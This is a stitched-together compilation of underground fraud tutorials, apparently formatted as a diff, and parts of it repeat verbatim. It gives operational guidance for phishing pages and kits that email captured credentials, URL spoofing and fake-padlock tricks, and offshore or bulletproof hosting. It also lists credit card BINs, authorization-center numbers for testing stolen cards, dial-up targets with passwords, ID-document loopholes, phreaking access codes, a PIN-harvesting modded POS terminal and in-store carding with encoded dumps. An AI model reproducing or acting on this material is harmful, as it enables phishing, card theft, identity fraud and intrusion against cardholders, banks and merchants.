+they are used for but for scam pages the average is around 2weeks which is more
+than enough time for your scam page. Look around and you should be able to
+find a reputable seller of these however be careful as there are alot of rippers
+selling these.
+Bulletproof Hosts - I do not know much about this type of host but it seems some
+people like to it to host scam pages because of it being anon,fast, reliable and it
+allows its users to advertise by spam unlike some hosts which will take your site
+down if spam complaints are recieved.
+Other hosts - Look around and spend some time trying out different hosts and you
+are sure enough to find a few good ones for scam pages, use a CC to card the
+accounts as it would be stupid to pay for it unless its reliable and anon.
+1.3 Other
+Here are a few methods to make your scam page look even more authentic,
+I have not tried these but here is some information from those that have..
+Fake Address bar -
+You create an activex floating white window the size of the address bar and
+place the x/y values of it where the normal address bar would be. Works perfect,
+however if they're not in full screen mode ur FUCKED.
+Example - http://www.doxdesk.com/personal/post...3-ie/bank.html
+Also depending on resolution the effect varies.
+Fake URL -
+You can mask the URL of your host by using this old (but still working) technique
+http://%00%01@/
+
+So
+www.paypal.com/" target="_blank" rel="nofollow">http://www.e-gold.com.@www.paypal.com/
+Magic!!
+It takes you to the paypal site but shows www.e-gold.com in the address bar...
+Fake SSL certificate -
+To get the lock at the bottom right of your screen on your scam page you will
+need to use a host that gives you the certificate as part of the package, the
+user who is viewing the scam page will have to click yes on the alert box that
+comes up and the padlock will be shown, this is good for sites like e-gold which
+tell the user to check for the padlock before logging in.
+http://www.apache-ssl.org is a good site to get you started with a host with ssl cert.
+CHECKING FOR AVS (CARD AND BILLING ADDRESS
+MATCH)
+If you want to check a credit card for verification match up on avs (registered biling address) and credit
+card number.
+Then please feel free to use the web site: get up and donate charity site
+weblink:www.getup.org.au/donate
+This site approves when there is a direct match between the card details and billing address.
+Billing address and card details valid match is vital when trying to a card and ship good's online.
+Cvv Carding Tutorial #3
+INTRODUCTION:
+C=The *use* of our credit system for personal gain & financial freedom!
+H=The practice of accessing *secure* computers with innovative techniques/skill.
+I=Assuming or establishing a *new* guise by "creating" an identity on paper.
+P=The know-how and interest in the telecom industry and the services it provides
+Hi-?!
+Issue two already! I just finised #-01 about a week ago, and already I feel
+I have enough text & information of interest to warrant a quick follow-up to
+#-01! ....so here it is, #-02! I hope #-01 has provided those who have read it,
+
+something to think about and/or "work on". If not, well then perhaps this one
+will. If not, then perhaps a monastery or convent would be a better place for
+the likes of you!!
+II.> PART 2-
+\|/
+?[>*C*H*I*P*=>!
+*C* - CARDING> /|\
+Intro:
+Below are as many BIN's as I could round up. Each one is listed according to
+the Banks ID No. (BIN) - which are the first 6 nos. of a CC. (Credit Card).
+Of course, the first no. indicates a Visa (4) or a Mastercard (5). Bin's aren't
+all that important to know, but can be if you NEED to know the name of a bank
+that issued the CC no. you have.
+So FYI and bemusement, here's that information-
+BANK IDENTIFICATION NUMBERS:
+^^^^ ^^^^^^^^^^^^^^ ^^^^^^^
+~~VISA BINs~~
+^^^^ ^^^^
+*4000-4999*
+401903 = Bank of America
+402400 = Bank of America
+402402 = Bank of America (Gold)
+403200 = Household Bank
+4040?? = Connecticut National Bk
+4040?? = Wells Fargo
+4050xx = 1st Interstate
+4052?? = First Cincinnati Bank
+405209 = First Nationwide Bank
+4060?? = Navy Federal Credit Union
+407000 = Security Pacific Ntl. Bank
+407129 = Colonial National Bank
+411427 = Chemical Bank
+412174 = Signet Bank/Virginia
+412185 = Citibank/Signet?
+41235? = Commerce Bank
+4128xx = Citibank
+416818 = Great Western Bank
+4131?? = State Street Bank
+4170?? = Beneficial National
+417129 = Colonial Bank
+4188?? = Ohio Savings & Loan
+4211?? = Chemical Bank
+4215?? = Marine Midland
+422591 = Chase Manhattan
+4226xx = Chase Manhattan
+4231?? = Chase Lincoln 1st Classic
+4232?? = Chase Lincoln 1st Classic
+
+4237?? = Cicero Credit
+4241?? = Natl. Westminester Bank
+425043 = First Chicago Bank
+425330 = Bank of N.Y./Consumer Edge
+425451 = Chemical Bank
+4262xx = Corestates Bank of DE
+427138 = Citibank
+4302?? = HouseHold Bank
+431068 = Bank-Layfayette/Imprl Svg's
+4312?? = Barnette Credit
+431301 = Valley Federal S&L
+431663 = Glendale Savings & Loan
+431772 = Gold Dome
+4321?? = Mellon Bank
+433213 = Bank of Indiana
+433222 = Far West Virginia
+4349?? = First Bank of America
+436800 = Sovran Bank/VA
+438733 = Bank One
+438760 = More Bank
+440121 = Gary Wheaton
+440862 = Charleston of Indiana
+441712 = Mellon Bank
+442813 = Bank of Hoven
+442843 = " " " "
+44288? = Colonial National Bank
+443600 = Security Bank of Monroe
+4448?? = First National Bank - RI
+46165x = First Interstate Bank
+4626?? = Indiana National Bank
+4646?? = Mercantile
+4672?? = Mercantile Bank
+467362 = First National Bank;
+467807 = Home Fed Svg's/1st Card
+467808 = Home Fed Svg's/1st Card
+468120 = Harris Trust Savings
+4696?? = Credit of Kansas
+4718?? = Colorado Bank
+4734?? = Madison Bank
+480012 = Valley Federal S&L
+4811?? = Bank of Hawaii
+4825?? = First Wisconsin
+4897?? = Village Bank of Cinn., OH _________
+/ Here are \
+4929?? = Barclay Bank/DE | what the |
+^ | holograms |
+| | SHOULD show!|
+| \_____ _____/
+*BIN* = #### ## (1st 6 nos.) Y
+| |
+| _____________________________|______
+
+| [ | ]
+^ | MASTERCARD INTERNATIONAL___v____ |
+| | [ v+===\*] |
+/--<+-->| 5555 1234 5678 9012 [ | I|] |
+| | ^^^^ ^^ ] Q I|] |
+| +==>| 6512 11-91 TO 11-92 [ /|\ I|] |
+| | | ^^^^ [_/^\_ I=] |
+| | | JUSTIN CASE MD [________] |
+| | | |
+| | [____________________________________]
+| |
+| *-==>IBN* = #### (above cardholder's name)
+| |
+| |
+A>|M/C's |
+==v===== v
+1st- X IBN.
+###### X #### Bank/Institution Name
+^^^^^^ ^ ^^^^ ^^^^ ^^^^^^^^^^^ ^^^^
+5000-5399
+=========
+5031?? = #? -Maryland Bank MBNA
+5127?? = 1015 -?
+520400 = 1006 -Security Pac Ntl Bk
+521142 = 6142?-Chemical Bank
+521531 = 6207 -Marine Midland
+521795 = 1033?-Manufacturers Trust
+5218?? = #? -Citibank N.A.
+523080 = #? -Harris Trust Svgs
+5233?? = 1226 -Huntington Bank
+524200 = 6066 -Chevy Chase F.S.B.
+5250?? = 1260 -?
+525400 = #? -Bank of America-ca
+525402 = #? -Bank of America-pa
+5263?? = 1263 -Chemical Bank
+5272?? = #? -Connecticut Ntl
+5273?? =p #? -Bank of America
+527706 = #? -FIB
+52820? = #? -Wells Fargo
+5286?? = #? -Chase Lincoln 1st
+5286?? = 1286 -Home Fed Savings
+528707 = #? -Valley National Bank
+529107 = 1001 -Signet Bank/VA
+529801 = #? -Bank One
+5317?? = #? -Norwest Financial
+5323?? = #? -Bank of New York
+532903 = 6017 -Maryland Bank; MBNA
+532956 = 6017 -Maryland Bank; MBNA
+539655 = 7462 -Universal Bank/AT&T
+539855 = 7462 -Universal Bank/AT&T
+5400-5999
+=========
+
+540126 = 6017 -Valley Federal S&L
+540193 = 8084 -Fidelity Investors Bk
+541037 = 6037 -Wells Fargo NA
+541065 = 6785 -Citibank NA
+541085 = 6785 -Citibank NA
+541116 = #? -1st Financial/Omaha
+541169 = 1169 -1st Financial/Omaha
+5412?? = 6037 -?
+5414?? = #? -Ntl. Westminster Bank
+5415?? = #? -Colonial National Bk
+541586 = 1586 -HouseHold Bank
+541711 = 1711 -?
+541919 = #? -FIB
+541933 = 1933 -Bank of Hoven
+541934 = #? -Berthoud Ntl Bk
+542096 = #? -Colonial Bank
+542143 = 2143 -?
+54224x = 1049 -MHT
+542418 = 1065 -Citibank
+5432xx = #? -Bank of New York
+5455?? = #? -PSFS
+5464?? = 1665 -Chase Manhattan
+546598 = " " -Chase Manhattan
+5601?? = 1352 -FIB
+5678?? = 1207 -Marine Midland
+591210 = 6282 -Wells Fargo
+xx= All nos. in series are that bank's.
+??= Unsure of full IBN/BIN no.
+B> - Authorization Centers - ("AC")
+Intro: Authorization Centers are located throughout the country and are in just
+about every financial institution that is involved in the distribution and/or
+issuance of credit cards. Of course, Visa and M/C have some as well.
+Citibank, First Interstate Bank and Bank of America all have their own AC's
+available to their merchants. There are however many other AC's that provide the
+same types of services to their merchants. It is the merchant who is 'really'
+providing the services though. It is the merchants responsibility in most cases
+to determine that a credit card is valid. On top of that they are also even
+offered a whole $50 if they assist in the conviction of anyone suspected of
+using a stolen/forged card. $50!! Hardly worth it, so most don't even try....
+One of the quickest ways a card is checked is by accessing an AC through a
+card reader. Verifone is perhaps the largest mfg. of these devices, which are
+used by most retail stores or restaurants for CC verifications.
+The telephone no. that is called using one of these card readers is the
+first one in which I've listed below. You can also log onto this "carrier" via a
+a modem, but I've yet to figure out what the necessary input is to utilize this
+service on my computer. A touch tone phone suffices however, and the required
+input is listed below for using this particular AC (Authorization Center).
+
+One other thing to note here is that whenever you are at a store/merchant
+and using a shady (at best) card, be especially alert to the merchant and/or
+cashier when they are getting verification of the transaction. If they use
+the telephone and voice in the request for the authorization, then listen
+for "Code-10", and if you hear them say this at any time- GET THE HECK OUT!!
+If they use a card reader for the transaction and get something like "CALL
+CENTER" on the read out, then remain calm and ask what the problem is, and if
+at anytime they are out of sight or on the phone with the center for
+any prolonged amount of time, then again- GET OUT OF THERE!!
+A "code-10" is a merchant's signal to an authorization center that they are
+suspicious of the card user. If you are using an AMEX, then run out of there
+twice as fast, because AMEX calls the police from their authorization center.
+V/MC don't usually call the police, but AMEX will use stall tactics while the
+police are on the way. (One way is to ask to speak with you and then ask you
+some rather lengthy detailed questions, like primary cardholders name, SSN &
+Mother's Maiden). You can always just look out the window and exclaim, "Hey!
+someone's stealing/towing my car!" and then leave pronto!....
+** Use the following telephone nos. before going into ANY store to use a card.
+They are worth the extra minute or so to be sure that the card is still valid!
+1>.
+800/228-1111 = On-Line Auth. Center (300baud)/Touchtone Ok too.
+Merchant No.#Card No.#Exp.Date#Amt# **push the "#" after each entry**
+(Merch No.=A 16 digit-#; 1st no. is 4 or 5 & can often be found on carbons
+just above the merchants name.)
+2>.
+800/228-2211 = This is the voice authorization number of the same group
+who operate the one above. I am fairly sure that these two are operated by
+M/C and Visa, and I do know that the merchant nos. that work on one, also
+work on the other. This AC, is also useful for obtaining a BIN no., and/or
+the issuing bank of a particular credit card. Just ask the verification op.
+for merchant services and she will connect you to their information dept.
+3>.
+800/554-2265 = Bankcard Auth. Ctr.
+For MasterCard: 1067#52#10#CardNo#Exp#$$$$#
+For Visa: 1067#24#20#CardNo#Exp#$$$$#
+4>.
+800/528-2121 = American Express Auth. Ctr. (Amex only)
+Live ops! - Give: (**Merch#+card#+expdate+amt) **=5041035528
+Merch. No. is for: Popolos Ristorante; 8115 Melrose LA,Ca. 90069
+5>.
+800/327-3584 Authorization Center for Visa & M/C
+***** Merchant No. format is: 101 ### ###; #= unknown no.
+6>.
+800/645-9120 Merchant Service Center for Citibank; NA
+****** Merchant No. format is: ### ### ### ### (the one I had is no longer
+
+[=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=]
+Glossary of terms used in the preceding text file.
+- Authorization Center = Voice and/or Data terminal which gives merchants
+varying "approval codes" on purchase requests. Some also provide info such as
+BIN No. and Bank Name of a particular card.
+- Bank Identification Number = Issuing bank's identifier. This number is
+assigned by the FDIC, I think. The No. can be found on Visa's (unraised)
+just above the CC number. Some larger banks will have several BIN's, because
+they own several smaller financial institutions that issue credit.
+Choice Visa is one example. They are owned by Citibank, but have there own
+seperate BIN. Another example is First Card, which handles Home Fed Savings
+credit accounts.
+- International Bank Number = Bank Identifier on a national level. The
+number is used by various merchants to verify/approve a cardholder when they
+have placed a telephone or mailorder request. It is the 4 digit no. just
+above the persons name, and is only found on M/C's (raised, 'usually' starts
+with a 1,6,7 or Cool & on Amex cards (unraised, usually starting with a 6).
+Though not an absolute, experience has shown that IBN's starting with 6,7 or
+an 8, are usually preferred accounts. IBN's that begin with a 1 or 2 are
+usually found on classic accounts. (see list above)
+- CV = Classic Account; -these two letters can be found on most Visa cards
+that are "Classic Accounts". They usually have a credit limit of some-
+where between $500 to $5000+, though some can go up to $10,000 for long term
+customers.
+- PV = Preferred Acct. or "Gold Card"; -usually limits of 5,000-10,000+. These
+cards are 'usually' found on Gold or 'preferred Visa Cards, and are worth
+their weight in 'gold' as well.... Some can go up to $40,000 or more!!
+++Any additional articles or noteworthy texts to be submitted for inclusion
+in the future issues of *CHIP*, should include a handle &/or method of contact
+for the author. Though not required, this will help in verifying the info &
+assure a timely publish date.
+Our method of contact is simple. Call 800-755-3493, press 9657 before end of
+greeting and give us some idea of what you know or have access to and we will
+consider your request. The only other method we feel safe with is via a typed
+letter sent to: *JC/CA* 15445 Ventura Blvd. #128; Sherman Oaks, CA 91403. We
+need more up to date H/P info since this is not our best subject and since
+there are many others more knowledgable in this field than we are... So let us
+know! ...Otherwise we may change *CHIP* to CIA! & become Anarchist!... then
+again, it's probably too late for that, since we do as we want anywayz..-JC/CA>.
+III.> PART 3:
+\|/
+?[>*C*H*I*P*=>!
+/|\
+*H* - HACKING>
+Intro:
+
+Hacking Numbers & Carriers! These may also be added to the EXTENDER.DAT
+files of most Hacking/Phreak programs, when reliable carrier no(s) are
+needed.
+* Telephone No= Pwd &/or Locale * Telephone No= Pwd &/or Locale
+------------------------------- ------------------------------
+206-863-0015= ? 800-325-1171= ?
+206-863-3963= ? 800-325-1340= ?
+206-863-3700= ? 800-325-1341= ?
+206-863-0426= ? 800-325-1342= ?
+206-863-1150= ? 800-325-1436= ?
+206-863-1183= ? 800-325-1401= ?
+208-772-6134= ? 800-325-1471= ?
+619-723-8996= ? 800-621-3224= ?
+919-323-9888= ? 800-621-3592= ?
+214-263-3109= ? 800-621-3678= ?
+206-825-7206= ? 800-621-3679= ?
+206-825-7598= ? 800-228-1111= ?M/Card-Visa
+206-825-7621= ? 800-334-4000= ?Message system
+206-825-7781= ? 212-370-4303= Cosmos NY
+206-825-6132= Try ctrl-x for prompt 313-855-0203= CosmosMI:ONNERR
+206-825-7905= ? 213-892-7211= Compuserve
+206-825-9000= Montgomery Ward 213-355-5241= Electronic News
+206-833-5329= Wont connect properly 800-555-8677= Ma Bell
+206-825-6234= Oil Company 800-424-9440= Bank
+206-931-4879= Auburn High 213-932-8294= Secret Service
+206-872-4690= Kent High 405-332-9998= Belle Co-puter
+414-476-8010= Milwaukee High 713-241-6421= Shell Oil
+206-771-6551= Tacoma School.P/w=VAXE 713-526-0149= Hospital
+206-825-7720= Compuserve 913-343-1042= Calling card
+312-499-2100= Sears 502-588-6020= Uof Louisville
+617-683-2119= Hospital 502-588-6036= " " "
+800-424-9494= Telenet 213-417-8997= TWA
+800-421-2123= ? 800-828-6321= IBM Computer
+800-558-0001= AGRODATA 206-828-3598= Microsoft
+206-357-7350= Ctrl-data-publishing 800-526-3174= RCA Mainframe
+414-354-0010= T.Y.M.E. Corp. 312-937-1210= ?
+202-553-0229= PENTAGON 206-833-6352= ?
+202-697-0814= PENTAGON 206-833-6364= ?
+304-376-2488= Savings & Loan 202-553-0229= T.A.C
+313-964-2018= Charge card Association N/A-950-1288= AT&T Info Service
+206-833-6133= ? 206-833-6134= ? *P/w For Milwaukee High GNIK, Code:4,71
+800-522-5465= Lab Link **P/w For Ma Bell 948DJU47R
+202-694-0004 User Id= Cohen
+===========================================================================
+====
+ABC East Coast feed 213 935-1111
+Try this # 206-825-2377, hit return a couple of times and you'll get ENTER
+PASSWORD then hit ControL 'U' a few times then hit return. you in
+simple.. Or try mashing keys until it says 'ART GAMBLIN - CHEVROLET'...
+III.> PART 4-
+
+\|/
+?[>*C*H*I*P*=>!
+/|\
+I - IDENTITIES
+Intro:
+DMVRULES.TXT
+What the DMV would rather you DIDN'T know:
+ 10-01-90
+13.301a:
+"...If the applicant is unable to provide a signature within the margin, the
+application should nevertheless be accepted, and there is NO need to prepare
+another application..."
+13.301b:
+..."Usual signature" means the signature the applicant uses when signing
+letters, "checks", etc. It need not correspond exactly to the full name as shown
+at the top of the application or photo document & and in fact, seldom will. If
+the signature includes a nickname not shown in the full name, or if it differs a
+lot from the full name, the employee should indicate "usual signature" in the
+space at the top of application.
+13.301c: ***important***
+If the applicant's, "usual signature" is "printed", it should be ACCEPTED on
+the application.
+13.307: Birth Date Verification
+Any Driver license showing birth date is acceptable in lieu of a birth
+certificate (bc). If the bc is unobtainable, certain other documents may be
+accepted in lieu of the bc. The acceptability of other documents should "NOT BE
+DESCRIBED TO THE APPLICANT" until it is reasonably ascertained that their birth
+record is unobtainable.
+The following ARE accepted forms of identification as listed in the
+DMV Employees Driver License Tech. Manual:
+<<< in order of preference.... their preference, of course! >>>
+1>. Birth Certificate or any "certified Birth Record/Registration".
+2>. Driver License, from CA. or an ID card issued by the State of CA.
+3>. All other state Drivers licenses, Id cards, to include Military too
+4>. Any foreign governments D/L and/or ID. Must have DOB listed on it.
+5>. Passports, Visas, immigration/alien docs or reg. cards. w/ DOB.
+6>. Dept. of Corrections or Youth Authority docs, signed by PA/CS/CAS.
+7>. Driver Education driving permits & training certificates, w/ DOB's.
+8>. Out of State ID cards -NOT necessarily issued by the state's DMV.
+9>. US Census Records. Auth. by 13007.5 VC; ** contact Census Bureau **
+10>. School Cerification (form dl-48); used ONLY when all other forms of Proof
+of ID have been exausted; *contact any local school to get rcrds*. This
+is also an accepted form of ID for SSA (Social Security Administration).
+** Note:
+
+Tax forms are not accepted with any degree of certainty by the DMV. It's
+always best to use what they see "thousands of time a day", since these docs
+are usually less scrutinized.
+If you have trouble getting the above docs, then just go to Nevada. In NV
+they take almost every Type of ID known in the US. Included in what they will
+accept are W-2 tax forms & 1099 gift-tax forms. Armed with one of these and a
+baptismal certificate you can get a NV ID/DL with no problem, and on the same
+day as well. NV is one of the few states that accept Baptismal Certificates.
+.... and Just'in Case you ddidn't know that, Bap. Certs. can be found at most
+at most religious bookstores & supply stores, especially Catholic.
+An added bonus is that they DO NOT fingerprint in NV. You also have the
+option of having your ssn imprinted on the ID card, which is helpful for back-
+up ID. You just tell them your ssn and they'll include it. One bad thing is
+that there is no Exp. date on their ID cards, however there Driver Lic's. do
+have exp. date's and are worth the extra "drive" around the city to get. The
+best days to go are on Tuesdays or Wednesdays.
+***Now here are a few additional points of interest to note for the heck of
+it, so here goes....
+*= THE =*
+**- APPLICATION -**
+II.> Driver Information and the Application.
+Quickly, there are 5 types of forms used by the DMV in processing such re-
+quests as DL, ID, Replacement (of either), Computer paper & the renewal appli-
+cation form (DL-1RN). BTW, according to this doc that I am sorta copying, it
+says that the renewal process will and is being phased out with "the new system
+now being installed". *CA has seen perhaps the very first of this 'new' system.*
+13.011
+Every applicant for an original, or renewal, driver license whose form DL-44
+indicates previous driving experience, but who does not indicate or produce a
+previous license, should be asked whether he/she holds a regular license from
+California or any other state or country. The reason for the inquiry (Sec-12511
+& 12518vc) should be "politely" explained. Instruction or learner's permit &
+"International Drivers Licenses" are not considered to be regular licenses. If
+an applicant over the age of 18 cannot produce a valid or recently (within one
+year) expired foreign license, a check by H-6 inquiry > to the automated sys.
+or Wats Line must be made prior to processing of the application.
++++H-6 inquiry to automated sys OR WATS line sounds like a hacking adventure!..
+Anyone with info on this possibility please fill us in at 800/755-3493 x-9657.
+IV.> PART 5:
+\|/
+?[>*C*H*I*P*=>!
+/|\
+*P* - PHREAKING>
+Intro:
+
+950XXXX.LST
+Here is a current list of operating L/D Co's, which provide access to
+telco. lines across our fine country (ha!)... Of course what makes it so fine
+is that with each of these L/D carriers, there is a code that is entered to be
+able to access the fine features of each of these fine L/D service providers.
+So someday with nothing better to do, give 'em a try and try out different
+access code numbers (randomly), and hopefully you'll be able to make FREE phone
+calls in no time. Don't abuse it however, because they do tend to monitor any
+high usage on these numbers.
+[-------------------------------------------------------------------------]
+| 950- | Code Format | Name of Company | Comments |
+[-------------------------------------------------------------------------]
+| 0223 | 6 digits + acn | Cable and Wireless | Business/calls overseas |
+| 0266 | 7 digits + acn | Com Systems | MC/V/AE w/o exp-ok! Hit "0"|
+| 0370 | 7 digits + acn | LDS | Long Distance Services |
+| 0488 | acn + 13 digits| ITT | |
+| 0511 | 6 digits + acn | Execuline | |
+| 1022 | 0 + acn + 14dig| MCI Execunet | Calling card - 14 digit # |
+| 1033 | 0 + acn + 14dig| MCI | Calling card - 14 digit # |
+| 1044 | 6 digits + acn | Allnet | |
+| 1050 | 6 digits + acn | Metrophone | |
+| 1055 | 6 digits + acn | Telesphere | MC/V/AE ok too!! push "0" |
+| 1407 | 7 digits + acn | TMC Watts #1 in CA | |
+| 1408 | 7 digits + acn | TMC Watts #2 in CA | |
+| 1444 | 9 digits + acn | Allnet | International Access also |
+| 1555 | 6 digits + acn | Telesphere | |
+| 1621 | 9 + acn + 6dig#| na | 9 + acn + 6 digits? |
+| 1772 | code + acn | na | Voice for "access code" |
+| 1820 | na | BizTel | |
+| 1979 | 6 digits + acn | VorTel | |
+| 1999 | 6 digits + acn | ITT | 800/275-0100 for account |
+[-------------------------------------------------------------------------]
+Design/Getting a scam page (Casino)
+1. Design/Getting a scam page
+So to start you will need a decent scam page, one that looks life the real deal a
+nd will fool people into entering there details. Scam pages come in diffent forms
+and sizes from a single page to multiple ones but as long as yours is accurate it
+should work well. I have seen many scam pages or spam mail with countless spelling
+and grammar mistakes, I advise everyone to use a spell checker and read through it a few times, if your
+the language you are using is bad then ask someone who is
+fluent in that language to check it.
+Designing your own scam page:
+I do not know much about designing your own apart from the basics, there are
+
+others who are advanced and can add things like security lock and incorrect entry errors
+but for now you should start off with basic stuff.
+1. Go to the webpage that you are wanting to replicate.
+2. File, view source, notepad or similar program should open with alot of text.
+3. Save somewhere safe and close.
+4. Open and copy the source to a web design program, i would suggest
+'Microsoft Front Page Editor' as it can be downloaded for free and is easy to use.
+5. Edit the webpage to suit your needs.
+6. Go back to the source and now you will have to edit a few lines of it so
+that the entires are sent to you ( I cannot at this time remember what lines
+to edit so i will edit this shortly)
+Or to make the above a little bit more easier, you can download the following
+program and rip an entire site for you to play around with in your choosen
+web design program..
+BlackWidow - http://sbl.net/Downloads/BlackWidow%20Setup.exe
+It has a 30 day trial restriction but a quick net search and you should be
+able to get a crack.
+Using free scam pages:
+Here are some free scam pages, thanks to Magister and blacksabbath who
+spent time creating them and gave them away at no cost, they are pretty
+decent and should work well. There are full versions of the e-gold and
+paypal scam page so if you would like that you can buy them
+off Magister.
+E-gold - http://www.glcco.com/invision/source...old%20LITE.zip
+Paypal - http://dataonesoftware.com/html/them...les/PayPal.zip
+eBay - coming soon
+AOL - http://blacksabbathpagez.tripod.com/aolsc.zip
+BankOne - http://blacksabbathpagez.tripod.com/bankone.zip
+Copy and past the links into a new browser as hotlinking might not work.
+The files are zipped so use winrar or a similar program to unpack them.
+Buying scam pages:
+You can by very proffesional scam pages from a few vendors, price varies on how
+good the page is, some vendors i would suggest are:
+Magister (CP)
+Aphrodite (CP)
+1.1 Setting Up Scam page (Getting details sent to email, icq etc)
+
+To make the details get sent to you, you will have to edit a few lines in one
+file which has to be done to the ones you are using. In the files specified
+below find the line mail("you@you.you") and change the part in brackets
+to your email.
+E-gold - access.htm is the start page, set mail address at acct.php
+Paypal - login.html is the start page, set mail address at paypal.php
+eBay - coming soon
+AOL - aol.comsupport is start page, set mail address at process.php
+BankOne - SecurityUpdate is the start page, edit same line when viewing source
+on SecurityUpdate
+1.2 Hosting Scam page
+You will need to find a stable anon host which will allow you to keep your
+scam page up for a few days, most hosts will take it down as soon as they
+notice or get complaints about it so choosing a good host is important.
+OffShore Hosts -Look for a host that is situated in a different country
+as they do not really care what it is used for and have slow/weak spam and
+fraud control, offshore hosts are always good for this sort of work.
+Radmins - If you have some spare money i would suggest ivesting in one or
+two radmins, radmins are computers you have full remoute access to so you
+can do whatever you want with them. A radmin with a good speed can do
+many things from hosting to spamming and browse for them so they are good
+investment for scam page users. Radmins can last for a long time depending what
+they are used for but for scam pages the average is around 2weeks which is more
+than enough time for your scam page. Look around and you should be able to
+find a reputable seller of these however be careful as there are alot of rippers
+selling these.
+Bulletproof Hosts - I do not know much about this type of host but it seems some
+people like to it to host scam pages because of it being anon,fast, reliable and it
+allows its users to advertise by spam unlike some hosts which will take your site
+down if spam complaints are recieved.
+Other hosts - Look around and spend some time trying out different hosts and you
+are sure enough to find a few good ones for scam pages, use a CC to card the
+accounts as it would be stupid to pay for it unless its reliable and anon.
+1.3 Other
+Here are a few methods to make your scam page look even more authentic,
+I have not tried these but here is some information from those that have..
+Fake Address bar -
+
+You create an activex floating white window the size of the address bar and
+place the x/y values of it where the normal address bar would be. Works perfect,
+however if they're not in full screen mode ur FUCKED.
+Example - http://www.doxdesk.com/personal/post...3-ie/bank.html
+Also depending on resolution the effect varies.
+Fake URL -
+You can mask the URL of your host by using this old (but still working) technique
+http://%00%01@/
+So
+http://www.e-gold.com.@www.paypal.com/
+Magic!!
+It takes you to the paypal site but shows www.e-gold.com in the address bar...
+Fake SSL certificate -
+To get the lock at the bottom right of your screen on your scam page you will
+need to use a host that gives you the certificate as part of the package, the
+user who is viewing the scam page will have to click yes on the alert box that
+comes up and the padlock will be shown, this is good for sites like e-gold which
+tell the user to check for the padlock before logging in.
+http://www.apache-ssl.org is a good site to get you started with a host with ssl cert.
+PART TWO ON SPAMMING WILL BE COMPLETED SOON.
+Dump + PIN from POS
+The best POS (Point Of Sale System) to use to get dump (track 1 and 2) and PIN on. For all carders who
+work or have connections with people who work in Bars, Cabs, Delivery service.
+When the customer uses their card and punches in the PIN this POS stores the PIN. And HEY! you get
+the dump + PIN.
+So from now Dump + PIN is not only a myth.
+Below is the details and model numbers vx670 - read up some more and hopefully before the end of
+Novemeber 2011, I will have some for intretsed and professional members.
+1.vx670 - wireless
+
+2.vx670 - wired
+Descriptions:
+This machine can Store track 1/2 along with pin are stored and time stamped.It got options to say
+approved, communication error, declined, unknown error and INSUFF funds.
+This POS Machine can process both debit and credit cards, machine will never communicate with the real
+bank server,machine is not physically tampered, just software was modded .It cannot process real
+transactions, it will fake the actual transactions,gives you receipt and stores t1&2+pin,which you can
+download later on your pc.
+Available Options:
+[-]Machine can process both Debit and Credit cards.
+[-]Can say approved, communication error, declined, unknown error and INSUFF funds.
+[-]You can add TIP to the sale options.
+[-]You can limit the machine not to process more than X number of transactions.
+[-]Can customize the Merchant receipt and customer receipt on your own
+[-]Data is 3DES encrypted, only with a valid key can able to decrypted it (ON/OFF feature available)
+[-]All the passwords,approval codes,MID,TID all can be changed from settings menu
+[-]All currency's are accepted on pos.
+[-]All pos's will come with necessary cables for a success functionning.
+Dumps Tutorial: #1
+Everything you wanted to know about instore carding
+Introduction:
+So youre interested in trying out instore carding? Instore carding is one of the fastest ways to get money.
+But you will need to keep your head on straight for this. As you should with every operation you go out to
+do. This tutorial will tell you the ins and outs of instore carding. Feel free to
+distrobute this as much as you want.
+For the beginners:
+Youre obviously reading this because you either A. Want to learn how to instore card or B. Want to see if
+you can find anything you are not aware of. For people who chose A. You should have atleast some prior
+knowledge of credit cards before you try instoring. If you do not that is ok too, just keep reading the
+tutorial and by the end of it you should be fine. The most important thing about instore carding is how
+you *Take the part* of the identity youre *Playinig* as. If youre going into a store looking to come out
+with $3-5k worth of electronics dressed in your normal apparel and being nervous, think again. You need
+to dress up and act like a person who would look like they could buy these items any day of the week.
+The first time youre going to be nervous ofcourse, its natural to be nervous the first few times. But with
+time and past experiences to look back on, it just gets easier as you go on.
+Dressing the part:
+
+This should come natural to most people out there. To buy something expensive you need to make it look
+like you can buy these items along with acting like you can (below). For your first operation i suggest
+should include you going into any of the clothing stores listed below and buy a decent amount of quality
+clothes. I cannot stress enough how quality plays a part in dressing up. Buying a sweater in walmart and a
+sweater in banana republic could determine the difference between getting out with your goods or running
+out of the store. Along with clothing you might want to buy some jewelry or a very high priced watch. If
+a cashier suspects something is up, seeing some classy jewelry or a watch could also help reduce the
+suspicion.
+Clothing stores are usually never uptight with purchases of clothing so that is why I suggest going there
+first to get some quality clothes. You can be dressed as you want in there and it wont matter. When you
+buy the new clothes, put them on in a restroom and then continue your activities on a higher priced basis.
+Acting the part:
+This area will come hard for some but easier for others. Prepare yourself before you go in with things you
+might say. If youre going into a store to
+buy smaller items ($800 and below) , this usually not hard to accomplish. But for larger items you should
+act as if you can afford these items at any time of day. Acting stuck up in a sense can accomplish this.
+Other than that, dressing the part is the other area that helps you present yourself as a person of wealth.
+Beginning:
+Before you go out there and start instoring you will need the following items.
+Card reader/writer - Youre going to have to (in most cases) need a card reader/writer to write new dumps
+on your cards. Especially if you want to re encode your cards and go out. The only case where you would
+not need this is if you were buying plastic from a vendor who offers to encode the dumps for you. For a
+reader/writer I highly recommend the MSR-206. It is the most popular encoder out there. You can buy
+them from
+Price: $200 $640
+Computer/Laptop (Preferred) - To be able to encode your dumps (later on) you will first need a computer
+to hook your card encoder up to. Using a desktop is fine but if you come into any problems with your
+dumps which is going to happen, you will have no way to re encode your plastic. You will have to drive
+home and re encode there. But if you have a laptop, you can bring your MSR with you and just hook it up
+and re encode while youre in your car. Doing this will save you gas, and time.
+Price: $600 to $2400
+Power Inverter - This is a very handy tool that youre going to need for this and you will probably find
+yourself using for all other types of things.
+The MSR requires a power source so buy or card one of these. If your laptop battery gets low aswell
+which will sometimes happen just hook it up aswell. I found a very good one at BestBuy for $80. It
+covers up to 800 watts (400 watts each plug).
+Price: $80
+Plastic - I have seen all sorts of ways to obtain plastic. From stealing others and using those to buying
+them from a vendor. You DO NOT want to steal anyones credit cards and start using those. And you do
+not want to re encode your own credit cards. Im sure it makes sense to do so but over time if you start
+using your own credit card, the credit card companys are going to see the name being used and will surely
+contact you about these occurances. The best bet is to buy plastic from a vendor. Think about this too.
+When buying plastic, get atleast 2 cards with the same name as your novelty. It will save money on new
